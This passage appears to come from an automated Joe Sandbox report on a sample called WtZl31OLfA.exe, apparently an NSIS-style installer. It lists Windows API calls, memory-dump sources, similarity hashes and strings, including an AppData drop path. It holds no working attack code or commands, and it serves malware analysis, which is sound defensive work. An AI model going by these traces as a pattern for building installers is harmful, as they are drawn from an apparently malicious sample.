                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
                                                                                • Instruction ID: 76e81b74098be2a3706baaa1e1a2527734eadd1478321fb398c06c814fc07831
                                                                                • Opcode Fuzzy Hash: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
                                                                                • Instruction Fuzzy Hash: B5D05E33B05100DBDB10DFE8AE08ADD77B5AB80338B24817BE601F21E4D6B8C6509B1D
                                                                                APIs
                                                                                • SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                • Instruction ID: c65f6eba747e04129790f2b1b21bae9375029ebd28d99582ecd6e8b4464eea9f
                                                                                • Opcode Fuzzy Hash: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
                                                                                • Instruction Fuzzy Hash: 56C09B717447007BDA119F609D4DF1777646764702F1544797344F51D0C774D450D61C
                                                                                APIs
                                                                                • SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                • Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
                                                                                • Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
                                                                                • Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\WtZl31OLfA.exe",00403536,?), ref: 00403266
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer
                                                                                • String ID:
                                                                                • API String ID: 973152223-0
                                                                                • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                                • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                                • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,00403F0E), ref: 00404140
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                • Instruction ID: 67e4992f565e21c11dbb8c54ac12ec2a13ba7de1e04ee321f93102ddb6e8c06b
                                                                                • Opcode Fuzzy Hash: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
                                                                                • Instruction Fuzzy Hash: B2A00176944501EBCE129B90EF49D0ABB62EBE4701B5185B9A685900348A728862EB69
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B43
                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B4E
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404BAB
                                                                                • SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
                                                                                • DeleteObject.GDI32(00000000), ref: 00404C21
                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D7B
                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F4B
                                                                                • GlobalFree.KERNEL32(?), ref: 00404F5B
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
                                                                                • ShowWindow.USER32(?,00000000), ref: 004050FA
                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00405105
                                                                                • ShowWindow.USER32(00000000), ref: 0040510C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                • String ID: $M$N
                                                                                • API String ID: 1638840714-813528018
                                                                                • Opcode ID: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                • Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
                                                                                • Opcode Fuzzy Hash: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
                                                                                • Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004045FE
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00404628
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046D9
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046E4
                                                                                • lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404716
                                                                                • lstrcatW.KERNEL32(?,: Completed), ref: 00404722
                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734
                                                                                  • Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C
                                                                                  • Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                  • Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                  • Part of subcall function 004062E4: CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                  • Part of subcall function 004062E4: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\WtZl31OLfA.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812
                                                                                  • Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
                                                                                  • Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
                                                                                  • Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: : Completed$A$C:\Users\user\AppData\Local\neoimpressionism
                                                                                • API String ID: 2624150263-3380217091
                                                                                • Opcode ID: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                                                • Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
                                                                                • Opcode Fuzzy Hash: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
                                                                                • Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\neoimpressionism\Vekselformular, xrefs: 00402154
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CreateInstance
                                                                                • String ID: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular
                                                                                • API String ID: 542301482-1797713023
                                                                                • Opcode ID: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                • Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
                                                                                • Opcode Fuzzy Hash: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
                                                                                • Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: p!C$p!C
                                                                                • API String ID: 0-3125587631
                                                                                • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                • Instruction ID: 15f69c865bc8d9ec0e9cf8060aa07673d574756af28658d99b75493111c5da86
                                                                                • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                • Instruction Fuzzy Hash: 1DC15831E042598BCF18CF68D4905EEB7B2FF99314F25826AD8567B380D7346A42CF95
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                • Instruction ID: c1774f2f946c4964f784778ac851d6f11cf56bcc8977249e4dfbf1b2b48c2d4a
                                                                                • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                • Instruction Fuzzy Hash: B2E17A71A0070ADFDB24CF58C880BAAB7F5EF45305F15892EE497A7291D738AA91CF14
                                                                                APIs
                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040434F
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404363
                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
                                                                                • GetSysColor.USER32(?), ref: 00404391
                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040439F
                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043AD
                                                                                • lstrlenW.KERNEL32(?), ref: 004043B2
                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043BF
                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D4
                                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040442D
                                                                                • SendMessageW.USER32(00000000), ref: 00404434
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040445F
                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A2
                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004044B0
                                                                                • SetCursor.USER32(00000000), ref: 004044B3
                                                                                • ShellExecuteW.SHELL32(0000070B,open,00432E80,00000000,00000000,00000001), ref: 004044C8
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004044D4
                                                                                • SetCursor.USER32(00000000), ref: 004044D7
                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404506
                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404518
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                • String ID: (B@$: Completed$N$open
                                                                                • API String ID: 3615053054-2720870854
                                                                                • Opcode ID: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                • Instruction ID: 98cd9110a96fdc90c980e8b88af1c06473e6a142e5aecddf25117f52f4c400a7
                                                                                • Opcode Fuzzy Hash: a63e6e2122d515d214c502fe3e454e68733c502862964fa3bbe4886b2a00d4bb
                                                                                • Instruction Fuzzy Hash: 217181B1900209BFDB109F60DD89AAA7B79FB84745F00803AF745B62D1C778AD51CFA8
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                • DrawTextW.USER32(00000000,Serrasalmo Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                Strings
                                                                                Memory Dump Source
